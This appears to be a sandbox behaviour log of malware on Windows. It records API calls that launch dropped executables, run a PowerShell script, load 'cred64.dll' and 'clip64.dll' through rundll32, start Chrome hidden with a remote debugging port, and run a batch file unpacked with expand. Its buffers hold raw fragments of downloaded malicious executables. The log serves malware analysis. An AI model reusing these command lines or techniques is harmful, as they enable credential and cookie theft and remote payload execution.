filepath_r: C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: Powershell.exe
parameters: -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
filepath: Powershell.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
1 1 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: C:\Program Files\Google\Chrome\Application\chrome.exe --remote-debugging-port=9229 --profile-directory="Default"
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000
0 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c expand Go.pub Go.pub.bat & Go.pub.bat
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ѶBS•×,•×,•×,¼/˜×,¼)/×,Ç¢(‡×,Ç¢/ƒ×,Ç¢)Ì×,¤‹Ñ—×,¼(‚×,¼-†×,•×-g×,Y¢%”×,Y¢Ó”×,Y¢.”×,Rich•×,PEL$Ëgà ò·Ÿ@0@€EÈÐààÄEØá8ãâ@8.textêðò `.rdatarHJö@@.dataÜm`,@@À.rsrcàÐl@@.relocÄEàFn@BhÐÉDèYÃÌÌÌÌhpÉDèYÃÌÌÌÌj hÔÏE¹dnFè/h0ÊDèæŒYÃÌÌÌj høÏE¹”tFèÿ.hÊDèÆŒYÃÌÌÌjhÐE¹TuFèß.hðÊD覌YÃÌÌÌj h$ÐE¹´oFè¿.hPËD膌YÃÌÌÌjhHÐE¹LtFèŸ.h°ËDèfŒYÃÌÌÌjh\ÐE¹ŒmFè.hÌDèFŒYÃÌÌÌjh{ÎE¹$uFè_.hpÌDè&ŒYÃÌÌÌjh{ÎE¹„uFè?.hÐÌDèŒYÃÌÌÌjh{ÎE¹ÌoFè.h0ÍDèæ‹YÃÌÌÌjh{ÎE¹mFèÿ-hÍDèÆ‹YÃÌÌÌjh|ÐE¹nFèß-hðÍD見YÃÌÌÌjhˆÐE¹8xFè¿-hPÎD膋YÃÌÌÌjh”ÐE¹ÜtFèŸ-h°ÎDèf‹YÃÌÌÌjh ÐE¹llFè-hÏDèF‹YÃÌÌÌjh¬ÐE¹|tFè_-hpÏDè&‹YÃÌÌÌjhÀÐE¹\pFè?-hÐÏDè‹YÃÌÌÌjDhØÐE¹ØwFè-h0ÐDèæŠYÃÌÌÌj\h ÑE¹ToFèÿ,hÐDèÆŠYÃÌÌÌj h€ÑE¹tpFèß,hðÐD覊YÃÌÌÌjhÑE¹ lFè¿,hPÑD膊YÃÌÌÌjh˜ÑE¹„rFèŸ,h°ÑDèfŠYÃÌÌÌj<h´ÑE¹ÜkFè,hÒDèFŠYÃÌÌÌj hôÑE¹ÄkFè_,hpÒDè&ŠYÃÌÌÌj hÒE¹€xFè?,hÐÒDèŠYÃÌÌÌjXhÒE¹LqFè,h0ÓDèæ‰YÃÌÌÌjhtÒE¹°xFèÿ+hÓDèÆ‰YÃÌÌÌjhŒÒE¹DvFèß+hðÓD覉YÃÌÌÌjh˜ÒE¹ÀwFè¿+hPÔD膉YÃÌÌÌjh¤ÒE¹älFèŸ+h°ÔDèf‰YÃÌÌÌjh¬ÒE¹TrFè+hÕDèF‰YÃÌÌÌjh´ÒE¹DsFè_+hpÕDè&‰YÃÌÌÌjh¼ÒE¹ÔsFè?+hÐÕDè‰YÃÌÌÌjhÄÒE¹<lFè+h0ÖDèæˆYÃÌÌÌjhÌÒE¹´uFèÿ*hÖDèÆˆYÃÌÌÌjhÔÒE¹|qFèß*hðÖD覈YÃÌÌÌjhÜÒE¹ürFè¿*hP×D膈YÃÌÌÌjhäÒE¹ rFèŸ*h°×DèfˆYÃÌÌÌjhìÒE¹xwFè*hØDèFˆYÃÌÌÌjhôÒE¹¤sFè_*hpØDè&ˆYÃÌÌÌjhüÒE¹hxFè?*hÐØDèˆYÃÌÌÌjhÓE¹<uFè*h0ÙDèæ‡YÃÌÌÌjh ÓE¹ÌlFèÿ)hÙDèÆ‡YÃÌÌÌjhÓE¹ülFèß)hðÙD覇YÃÌÌÌj h0ÓE¹,mFè¿)hPÚD膇YÃÌÌÌj h@ÓE¹ÄnFèŸ)h°ÚDèf‡YÃÌÌÌjhPÓE¹˜xFè)hÛDèF‡YÃÌÌÌjhXÓE¹øxFè_)hpÛDè&‡YÃÌÌÌjh`ÓE¹ÌuFè?)hÐÛDè‡YÃÌÌÌjhhÓE¹¨wFè)h0ÜDèæ†YÃÌÌÌjhpÓE¹nFèÿ(hÜDèÆ†YÃÌÌÌj h|ÓE¹(yFèß(hðÜD覆YÃÌÌÌj hŒÓE¹\mFè¿(hPÝD膆YÃÌÌÌjhœÓE¹ìpFèŸ(h°ÝDèf†YÃÌÌÌjh¤ÓE¹ìmFè(hÞDèF†YÃÌÌÌjh¬ÓE¹$oFè_(hpÞDè&†YÃÌÌÌjh´ÓE¹dqFè?(hÐÞDè†YÃÌÌÌjh¼ÓE¹loFè(h0ßDèæ…YÃÌÌÌjhÄÓE¹ xFèÿ'hßDèÆ…YÃÌÌÌjhÌÓE¹ uFèß'hðßD覅YÃÌÌÌjhØÓE¹LnFè¿'hPàD膅YÃÌÌÌjhàÓE¹tFèŸ'h°àDèf…YÃÌÌÌj hèÓE¹4tFè'háDèF…YÃÌÌÌjhøÓE¹ÔpFè_'hpáDè&…YÃÌÌÌjhÔE¹„lFè?'hÐáDè…YÃÌÌÌjhÔE¹ÔvFè'h0âDèæ„YÃÌÌÌjhÔE¹vFèÿ&hâDèÆ„YÃÌÌÌjhÔE¹¼pFèß&hðâD覄YÃÌÌÌjh$ÔE¹xFè¿&hPãD膄YÃÌÌÌjh8ÔE¹¤pFèŸ&h°ãDèf„YÃÌÌÌjhLÔE¹wFè&häDèF„YÃÌÌÌjhlÔE¹pFè_&hpäDè&„YÃÌÌÌjh€ÔE¹|nFè?&hÐäDè„YÃÌÌÌjh˜ÔE¹dtFè&h0åDèæƒYÃÌÌÌjh¤ÔE¹ôqFèÿ%håDèÆƒYÃÌÌÌjh¼ÔE¹@yFèß%hðåD覃YÃÌÌÌjhÈÔE¹wFè¿%hPæD膃YÃÌÌÌjhàÔE¹TlFèŸ%h°æDèfƒYÃÌÌÌjhôÔE¹œoFè%hçDèFƒYÃÌÌÌjhüÔE¹”qFè_%hpçDè&ƒYÃÌÌÌjhÕE¹ÜnFè?%hÐçDèƒYÃÌÌÌjh,ÕE¹qFè%h0èDèæ‚YÃÌÌÌjh8ÕE¹œrFèÿ$hèDèÆ‚YÃÌÌÌjhDÕE¹¼vFèß$hðèD覂YÃÌÌÌjhPÕE¹4qFè¿$hPéD膂YÃÌÌÌjhdÕE¹ðwFèŸ$h°éDèf‚YÃÌÌÌjhxÕE¹yFè$hêDèF‚YÃÌÌÌjh€ÕE¹luFè_$hpêDè&‚YÃÌÌÌj@hˆÕE¹üoFè?$hÐêDè‚YÃÌÌÌjhÌÕE¹lrFè$h0ëDèæYÃÌÌÌjLhØÕE¹ÄqFèÿ#hëDèÆYÃÌÌÌj<h(ÖE¹¤mFèß#hðëD要YÃÌÌÌj hhÖE¹ìsFè¿#hPìD膁YÃÌÌÌjhxÖE¹<rFèŸ#h°ìDèfYÃÌÌÌjh„ÖE¹¬qFè#híDèFYÃÌÌÌjhÖE¹tFè_#hpíDè&YÃÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELSÉÀgà ð²€I@°Iv @€W kðø! @à.rsrcð@À.idata  @À Ð)0@àwnvsgzkdp0p@àvzzmrlzqpI†@à.taggant0€I"Œ@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win64 $7PEd† ™Ügð" JH VXH@À þçž@ PRžàQ¬U°Y‡GðUì²ZžÈf€RLepR(0öQ@RŽ.textÌIHJH `.datah‚`H„NH@À.bssÜåðOÀ.idata¬UàQVÒO@À.didataŽ@R(P@À.edatažPR8P@@.tlsp`RÀ.rdatampR:P@@.relocDe€Rf<P@B.pdataì²ðU´¢S@@.rsrc‡G°YGVW@@`gød@@@Boolean@FalseTrueSystem@@AnsiCharÿ`@ Charÿÿ€@ShortInt€ÿÿÿ @SmallInt€ÿÿÿÀ@Integer€ÿÿÿà@Byteÿ@Wordÿÿ @Cardinalÿÿÿÿ@@Pointer`@Int64€ÿÿÿÿÿÿÿˆ@UInt64ÿÿÿÿÿÿÿÿ°@ NativeInt€ÿÿÿÿÿÿÿØ@ NativeUIntÿÿÿÿÿÿÿÿ@Single@Extended0@DoubleH@Comp`@Currencyx@ ShortStringÿ@ PAnsiChar8@°@ PWideCharX@Ð@ByteBool€ÿÿÿÈ@FalseTrueSystem@WordBool€ÿÿÿ@FalseTrueSystem@@LongBool€ÿÿÿ8@FalseTrueSystemx@string@ WideString¨@ AnsiStringÀ@ VariantØ@ PFixedUInt@ø@TClass°%@@HRESULT€ÿÿÿ8@PGUIDP@X@TGUID@D1ø@D2ø@D3D4  _A &op_Equality@P@LeftP@Right À_A&op_Inequality@P@LeftP@Right Ð`AEmptyP@ à_ACreateP@Data@ BigEndian `ACreateP@Ø@Data@ AStartIndex@ BigEndian@PInterfaceEntry8@@@TInterfaceEntry(P@IID8@VTable¸@IOffset@_FillerÐ@  ImplGetterð@PInterfaceTable@@TInterfaceTableˆ¸@ EntryCount@_FillerEntries˜@TMethod8@Code8@Data 0Ã@ &op_Equality@@Left@Right PÃ@&op_Inequality@@Left@Right Ã@&op_GreaterThan@@Left@Right ÀÃ@&op_GreaterThanOrEqual@@Left@Right @Ä@ &op_LessThan@@Left@Right pÄ@&op_LessThanOrEqual@@Left@RightX@¸%@X@@pÇ@€Ç@pÌ@`Ì@ Ì@°Ì@ÀÌ@Ì@°Â@àÂ@Å@Ã@Ã@ Ã@%"@DñÿT@Bñÿ„@Bñÿ¹@Cñÿ@BñÿB@Bñÿw@Cñÿ»@Cñÿ@Cñÿ;@Cñÿp@Cñÿ¨@Cñÿô@Cñÿ?@CñÿŠ@Cñÿä@Cñÿ1 @Bñÿ{ @BñÿÅ @Bñÿ!@Cñÿm!@Cñÿª!@Cñÿí!@Cñÿ1"@Jòÿt"@Jóÿ«"@Jôÿî"@Jõÿ]#@Jöÿš#@J÷ÿ×#@Jøÿ $@Jùÿo$@Kúÿ¦$@JûÿÞ$@Müÿ%@Jýÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $A{Ñk¿8¿8¿8 b<8¿8 b,8¿8¾8©¿8‡8 ¿8‡%8¿8‡"8¿8Rich¿8PELÚâGOà  nÎBƒ8€@°ã8@…4›´@ØR>¹7P5 d €Ð.text®mn `.rdatab*€,r@@.data¼~°ž@À.ndata0€À.rsrcØR@T @@.reloc2 ²@BU‹ìƒì\ƒ} t+ƒ} F‹Eu ƒH‹ Ô-G‰HPÿuÿu ÿuÿŒ‚@éKSV‹5Ü-GWE¤Pÿuÿ‚@ƒeô‰E EäPÿuÿ”‚@‹}ðƒeð‹D€@鉶FR¶VV¯Uè‹Ï+Mè¯Á™÷ÿ‰M¶ÀÁà‰E¶FQ¯Á¶NU¯MèÁ™÷ÿ‹M¶VT¯Uè¶À ȶFP¯E™÷ÿÁá¶À ȍEôP‰MøÿH€@ƒEðP‰EEäPÿu ÿ˜‚@ÿuÿӃEè9}èŒnÿÿÿƒ~Xÿteÿv4ÿL€@‰E…ÀtU‹} jWÇEäÇEèÿP€@ÿvXWÿT€@ÿu‹5X€@WÿÖh ‰E EäPjÿhÀ­FWÿœ‚@ÿu WÿÖÿuÿӍE¤Pÿuÿ ‚@_^3À[É‹L$¡è-G‹ÑiÒ @‹TöÂtUVWq3ÿ;5ì-GsD‹ÎiÉ @DS‹öÁtGëöÁt ‹ÏO…Ét ëöÁu ‹Ù3ڃã3ىF @;5ì-GrÊ[_^ÂU‹ìQQ‹US‹è-GV‹òiö @ó‹F3ÉW‰Mü‰Mø¨t 9M tƒà¾‰FB;ì-GsD‹ÂiÀ @|‹BöÁt jRè¤ÿÿÿ‹öÁu(öÁ@tÿEüöÁtÿEüëÿEø‹Ð;ì-Gr¼3À_^[Ƀ}ütóƒ}øtƒN@ëç‹NáÿÿÿƒÉ‰Në֋L$¡è-GV3öƒù s695ì-Gv.PW‹¨u3ÿGÓç…zütƒÈëƒàþ‰FÂ @;5ì-Gr×_^ÂU‹ìƒì ¡Ü-GƒeüSV”W‹=ì-G‰Eø‹Eø3Û9tM;ßsG‹5è-GƒÆ‹öÂu*‹E…Àtƒ<˜t‹Mü3À@Óà‹Nüƒâ#ȉMô‹MüÓâ9Uôu CÆ @;ßrÄ;ßt ÿEüƒEøƒ}ü r‹Eü_^[É‹D$…Ày@iÀ@¹0G+ÈQèÐKÂV‹t$ëh‹ÆkÀð-Gƒ8t\Pèæ=ÿÿÿtUPè·ÿÿÿ…Àu@FëH‹Î‹ð+Áƒ|$ t/¬­Fjÿ5¤­Fh0uÿ5¬­FÿP@Phÿt$ÿˆ‚@…öy”3À^¸ÿÿÿëõ‹D$‹ Ü-GjÿtlèkÿÿÿÂhÐð@ÿt$è/;¡İ@ÿ4ˆjè°SPèKËD$™3Â+‹İ@‹ÈÁøiÀ@Vƒáÿ4ŠȰ@Pè}Sƒ|$‹ð}Vè¡K‹Æ^ÂU‹ììSVWEüP¡°.GƒÈP3ÛSÿu ÿuÿ€@;Ãui‹5€@¿ë9]uKS…ðýÿÿPÿuüè²ÿÿÿ…ÀuW…ðýÿÿPSÿuüÿօÀtÕÿuüÿ€@jèëM;Ãt$Sÿ5°.Gÿu ÿuÿÐë ÿuüÿ€@3À@_^[É 9°.Guîÿu ÿuÿ €@…ÀuÞëßU‹ì¡Ä°@‹@V…Àt‹ðë ‹5„.GÆ€EP¡°.G EPjj"èÓþÿÿPVÿ€@÷ØÀ÷Ð#E^]ÂÌU‹ìì¬¡Ô-GSV‹uWjY}Ðó¥‹UԋM؋ò‹ùiö@iÿ@‰Eô¸0GðøEԣİ@‹EÐ3ۃÀþ‰]üƒøG‡éÿ$…ø0@Rh´@è—L‹EÔYYéØSè@þÿÿPh”@è|LYYSÿuÔè@9¸ÿÿÿé²ÿ”­F9]ôtëSÿ<‚@ëâRè(ýÿÿpÿVh€@è?LYYSVè0ýÿÿé|SèäýÿÿPh`@è LYYSÿuÔèä8éP3Éè¬ýÿÿ‹ðVhL@èüKYYƒþ3öFVÿŒ€@é&h0@èÜKYÿuôÿ@‚@é ‹Â9]Üu%‹ …€.G‰ …@.G3ÉAèSýÿÿ‹Mԉ€.Géá‹ …@.G‰ …€.Gé΋u܍4µ€.G‹3À;Ë”À#Mà‰‹D…Ôé¸ÿ4€.G雡 ­F‹5D‚@;ÃtQPÿ֋UÔ¡Œ­F;Ä~RPÿÖéujðèçüÿÿÿu؋ðVhôŽ@èKƒÄ ÿuØVÿˆ€@…À…IÇEühÀŽ@èøJYé2jðè¤üÿÿÿu؉EPhˆŽ@èÚJƒÄ ÿuè…E‹ð;ó„†j\Vè E‹ð·>Sÿu3Àf‰ÿ„€@…ÀuHÿ€€@=·tÿ€€@Pÿuh0Ž@è„JƒÄ ÿEüë.ÿuÿ|€@¨u!ÿuh¸@èbJÿEüë ÿuhx@èPJYYf‰>ƒÆf;û…zÿÿÿhÐð@9]Øt"jæèý6ÿuh°°Lè‡Gÿuÿx€@éSjõéòýÿÿSè¿ûÿÿ‹ðVè0J…ÀtÿuØVh @èìIƒÄ ‹EØé,ÿuÜVh¸Œ@èÓIƒÄ ‹EÜéjÐèzûÿÿjߋðèqûÿÿj‰Eègûÿÿ‹øWhœŒ@è¡IYYÿuVÿt€@…Àt hÐð@jãékýÿÿ9]Üt'Vè¬I…ÀtÿuVè2ShÐð@jäè06WhpŒ@ë WhLŒ@ÇEüèGIYéIþÿÿSèôúÿÿ‹ðEPWh Vÿp€@…Àt$‹E;Æv)f9t$VèDI;ÃtƒÀ,PÿuèhFë 3Àf‰ÇEü9]Ü…+h WWÿl€@éjÿè‹úÿÿMQVh SPSÿh€@…À…÷3ÀÇEüf‰éæjïèXúÿÿPVètD…À…ÐÇEüéÄj1è6úÿÿ‹ð‹EԋÈÁøVƒàƒáPQh؋@‰ủMèZHƒÄVèÓBV¾È°@…ÀtVè§Eëh°°LVèšEPè­LPèªEVè·E¿Ø0Aƒ}|1VèCH3É;ÃtMàQƒÀPÿd€@‹È‹EƒÀý €#Á÷ØÀ@‰E9]uVèhC3Àƒ}•À@Ph@VèrC‰Eøƒøÿ…¿9]uwVh ‹@è©GYYh0GWèEVh0Gè÷DÿuèhÐð@èæLWh0GèßD‹EÔÁøPhÐð@èeAƒèuhp‹@èYGYé6ÿÿÿHt@h@‹@èFGYVjúéÇúÿÿÿuÌjâè4ƒ}uÇEüÿuVhðŠ@èGƒÄ éPh¼Š@èGÿˆ.GYéCÿuÌjêè¿3ÿ´.GSSÿuøÿuÜè¹ÿ ´.G‹øVWhŒŠ@èÉFƒÄ ƒ}àÿuƒ}äÿtEàPSPÿuøÿ`€@ÿuøÿ¼€@
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $7¬âsz±sz±sz±büÁ°rz±8ðvz±szñkz±‹ýǰrz±‹ý=±rz±szU±rz±‹ýÀ°rz±Richsz±PEL]Égà +lh\À€h@o@…‚h< hPIðn` ¨€h8€hh.text khlh `.rdatal€hph@@.data0hvh@À.rsrcPI hJxh@@.reloc` ðn Ân@BU‹ìd¡0‹@ ‹@ ‹‹‹@]ÃÌÌÌÌÌÌÌÌU‹ìƒì ƒ}„þ‹E‰Eð‹Mð·úMZ…æ‹Eð‹MH<‰Mü‹Uü:PE…Ë‹Eü·Há „¸ºk‹Müƒ|x„¢ºk‹Müƒ||„Œºk‹Mü‹UTx‰Uô‹Eô‹MH‰Mà‹Uô‹EB ‰Eì‹Mô‹UQ$‰UäÇEøë ‹EøƒÀ‰Eø‹Mô‹Uø;Qs6‹Eø‹Mì‹U‰Uè‹EèPè;E u‹Mø‹Uä·J‹Mà‹U‹Âëë¶3À‹å]ÂÌÌÌÌÌÌÌÌÌÌU‹ìQhÿjÿ€¨Pÿ €¨‰Eüƒ}üu3Àëèv™¹ÿ÷ù‹Eü‰‹M‹Uü‰‹Eü‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒìÇEüEüPèšÿÿÿƒÄ‰Eø‹Mø9^ޱjjjjÿT€¨™‰Eð‰Uôÿ€¨3҉Eð‰Uôjjÿ€¨3ɉEð‰MôjÿP€¨3҉Eð‰UôjjÿX€¨™‰Eð‰Uôjÿ`€¨·À™‰Eð‰UôjÿL€¨™‰Eð‰UôjÿD€¨3ɉEð‰Môjjjjjjÿ@€¨™‰Eð‰Uôjjÿ\€¨™‰Eð‰Uô‹UüRjÿ€¨Pÿ€¨‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì ÿ,€¨‰Eø‹EPÿ€¨ÿ,€¨+Eø‰Eô‹Mô;Mr ÇEüëÇEü¶Eü‹å]ÃÌÌÌÌÌÌÌÌÌÌÌU‹ì¸0âÿ]ÃÌÌÌÌÌÌU‹ìQÇEüë ‹EüƒÀ‰Eü‹MMü¾…Òtëè‹Eü‹å]ÂÌÌU‹ìƒìƒ}u3À運EPè´ÿÿÿ‰Eôƒ}ôu3ÀéhÇEüÇEè‹M‰MøÇEä‹UôÁê‰Uô‹Eô‰Eðë ‹Mðƒé‰Mðƒ}ðv?‹Uø·Eü‰Eü‹Mø·QÁâ 3Uü‰Uè‹EüÁà3Eè‰Eü‹MøƒÁ‰Mø‹UüÁê Uü‰Uü벋Eä‰Eìƒ}ìtƒ}ìt0ƒ}ìtP醋Mø¶Uü‰Uü‹EüÁà 3Eü‰Eü‹MüÑéMü‰Müëa‹Uø·Eü‰Eü‹MüÁá 3Mü‰Mü‹UüÁêUü‰Uüë;‹Eø·Mü‰Mü‹UüÁâ3Uü‰Uü¸Ñà‹Mø¶Áâ3Uü‰Uü‹EüÁè Eü‰Eü‹MüÁá3Mü‰Mü‹UüÁêUü‰Uü‹EüÁà3Eü‰Eü‹MüÁéMü‰Mü‹UüÁâ3Uü‰Uü‹EüÁèEü‰Eü‹Eü‹å]ÂÌÌÌÌÌÌU‹ììèb¶À…Àu jÿ €¨è­üÿÿhôèãƒÄhôýÿÿQjÿ0€¨•èûÿÿRhÿ€¨è•‡jÿ €¨‹å]ÂÌÌÌÌÌÌU‹ìƒì,EÔPÿ$€¨‹Mè‰Müƒ}üs2ÀëQhh€¨hx€¨ÿ4€¨Pÿ8€¨…Àt2Àë2h”€¨ÿ<€¨‰Eøƒ}øt2ÀëhÐèÿüÿÿƒÄ¶Ð…Òu2Àë°‹å]ÃÌÌÌÌÌÌÌÌÌÌÌU‹ìƒìÇEðë ‹EðƒÀ‰Eð}ðs ‹MMðŠUðˆëáÇEôÇEøë ‹EøƒÀ‰Eø}øƒ¹‹MMø¶ Mô‹Eø3Ò÷u‹E ¶ʋÁ3Ò¹÷ñ‰Uô‹UUøŠˆEÿ‹MMø‹UUôŠˆ‹MMôŠUÿˆ‹EøEô3Ò¹÷ñ…Òu)‹UUø¶kȃÁáÿ€yIÉÿÿÿA‹UUøˆ ë'‹EEô¶ñªáÿ€yIÉÿÿÿA‹UUôˆ é1ÿÿÿ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ì‹M¸áõQ‹ÐJuýYIuö]ÃÌÌÌÌÌÌÌÌÌU‹ìQV‹EE ¶‹MM¶Â3Ò¹÷ñ‹EŠ ˆMÿ¶Mÿ‹E3Ò¾÷öʋÁ3Ò¹÷ñˆUÿ¶UÿÑââÿ€yJÊÿÿÿBˆUÿ¶EÿƒðU%ÿ€yH ÿÿÿ@ˆEÿ¶Eÿ^‹å]ÃÌÌÌÌÌÌÌÌÌÌÌU‹ììðèrøÿÿ‰… ÿÿÿDžÿÿÿ¸kÈÆ¨ôºÁâÆ‚¨Ô¸ÑàÆ€¨Ö¹kÑƂ¨¸Áàƀ¨o¹kÑƂ¨¹¸kÈƁ¨ºkÂƀ¨‹¹ÁáƁ¨ºk ƀ¨&¹kÑ Æ‚¨¸kÈ Æ¨õºk ƀ¨¹kÑ Æ‚¨¸kÈƁ¨zºkÂƀ¨0ÿ€¨‰…ÿÿÿ¹ÁáƁ¨ŠºkÂƀ¨M¹kÑƂ¨ï¸kÈƁ¨ºkÂƀ¨€¹kÑƂ¨¸kÈƁ¨"ºkÂƀ¨§¹kÑƂ¨x¸kÈƁ¨ºkÂƀ¨µ¹kÑƂ¨ ¸kÈƁ¨ÖºkÂƀ¨Ë¹kÑƂ¨³ÿ,€¨‰…ÿÿÿ¸kÈƁ¨DžPÿÿÿ±ÿ€¨‰…4ÿÿÿ‹•PÿÿÿRj‹…4ÿÿÿPÿ €¨‰Eü¹kыEüÆ5DžDÿÿÿâDž@ÿÿÿþÇEܔ‹Dÿÿÿ;@ÿÿÿ|C‹UÜ•Dÿÿÿ‰U܋EÜ%€yHƒÈþ@…Àu ‹MÜÑá‰MÜë‹Eܙ¹÷ù…Òu ‹U܃Â2‰UÜë5‹EÜ…@ÿÿÿ‰E܁}Üè} ‹M܃Ád‰MÜë}ÜÐ~ ‹U܁êȉUܸÁà‹MüÆѺÑâ‹EüÆŹkÑ‹EüÆ(¹Áá‹UüÆ p¸kÈ‹UüÆ c¸kÈ‹UüÆ ɸkÈ‹UüÆ )¸Áà‹MüÆîºk ‹MüÆ¿ºk ‹MüÆ·ºk ‹MüÆ–ºk ‹MüÆ`ºk ‹MüÆeºk‹MüƱºk‹MüÆxºÁâ‹EüÆ7¹kÑ‹EüƐ¹kÑ‹EüÆ\¹kÑ‹EüÆ?¹kÑ‹EüƹkÑ‹EüÆm¹kÑ‹EüÆž¹kÑ‹EüÆ"¹kÑ‹Eüƪ¹kÑ‹EüÆ ¹kÑ‹Eüƽ¹kÑ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÍRŠà" 0"; `@ ``…Ä:O`œ€ 0:8  H.text¨ " `.rsrcœ`&@@.reloc €,@B.CSS¨ ¨.@Àø:H¤*Œ0¤(   +>~~Ži~~Ži(~~Ži~~Ži(X 2¾Þ&Þrp(rp((+~~Ži@o ~ ˆ~(*HPb %Ð( €*0å AA? È« Û}Z \4A YÒJ [x,Z §^ vÇào %¦ —s' î<Òb G›ø ŸYÓ' ž³ µªE ƒ²¡ :eN Û %`æ u²T +(ó  æ ò] W÷• ë;Œ ÔY¯] \˾d \Ç¢v û®Q üæ< ]2³ 夭' o½  wà »!j+ x¾! 6í8" ¼ˆ.# Œ&$ Äî% gÓ=& ð;:N' |¦¯K( \›j) pô¹:* _‡áY ·G‡Z+ ¦ƒ,n!j&&)"1  nj[m +'\jn[mn!j0j n[&nj2 nj[&+( \$Z-* - .nj0  Z +Y! 1 ,n j[i/+(-//( ( œ.//]‘œÞ&Þ/X// 2Ïn)j1 &a [&/0+40-/‘X./‘X ]0-0‘2-0-/‘œ-/2œ/X// 2Ã/0138q 9¸é^4 ’§r5 ¸Ù` 6 Ñß'A7 `ˆ%8 ¶Á B9 ‡d°: •Äòx; JXÆk< šÑ|(= eŽps> eTÇA? mô…{@ ¤>A È*r1B ¡³S[C z”>D ‘ÐåGE ¿qw7F N/2'G ¯ŒýH  3pI 3•,L þ&Ú ßIFJ ¦1·iK Åى$L Ÿê·p c´@M üVdN Fÿ—O ù¢. P ÿ¸3RQ ×|¸R ä¾7xS •iY~T õhU ? oV ZÿÚW bH´ZX üèB[Y âª&YZ };7%[ ½9\ o/3] `…]^ š Ch_ ™£eY` FNa ¨¬?b ûÙtmc 5Œ,d[aZLAj`nai4;:Za<n9jam:cj\n/ CDZF+Fj:n[&O4[I=>Z:8nPj1YjKn[&Sj6n/R6Y9^2 Jj?n[mH[S2 cj@nXmZ+.NW[&^jZn[iF9jZnaiDWjGnaiYEnJjYiD1X19jIn2M]X=X&&Hn4j0VnPjamZZnDjXmGL57 UXYL+aCX`7&&3X33 ?ƒýÿÿe8ß/X1]/0-/‘X1]0s ff-0‘o ˜± g øDÿ`h ›$i ÅØj –s,k _ü8l “;”7m †Æln ë"fo N"rVp ­½}q ´(r n©9s nïzYt ¶m^u ˆv - ’zw šÂWUx xhpy Öe z `r÷ { Ö0| L¤D+} kO_~ . \ „iž!€ #Lñn ЯÁ!‚ Ä5Ÿƒ eñ† „ Ø:7(… e#x† ½»8‡ yÖÆHˆ —v\)‰ wÎ&2Š ٝ!‹ „šVŒ ßÃI jÊ@`Ž ;Ìx  ž7U 3gNp‘ ¹« ’ G«ð5“ Þg5q” ‰Qœ• œÿ – ŠÕO—-0-/‘œi”a‡yjnXm{–jon&&ƒjkn2‰j}n[&‚†0 mn~j[i…j{n0 ”ta“+€jnYmˆn“arjnlj[mu~jjn2gazxj’nZihŠj•n/ qjŽnXm’pw6•aw-/f( r9p( o ( o œÞ&Þ-/‘-0‘X1]˜s ™™-˜‘o s eo šsr1ŒX—sZm+ ƒj{nYmoe‘šÞ&Þš™o aÒšsr/ ŒX—+sZmešœeXee?ýÿÿ*(Ýû‡ÄK¡©0ü( 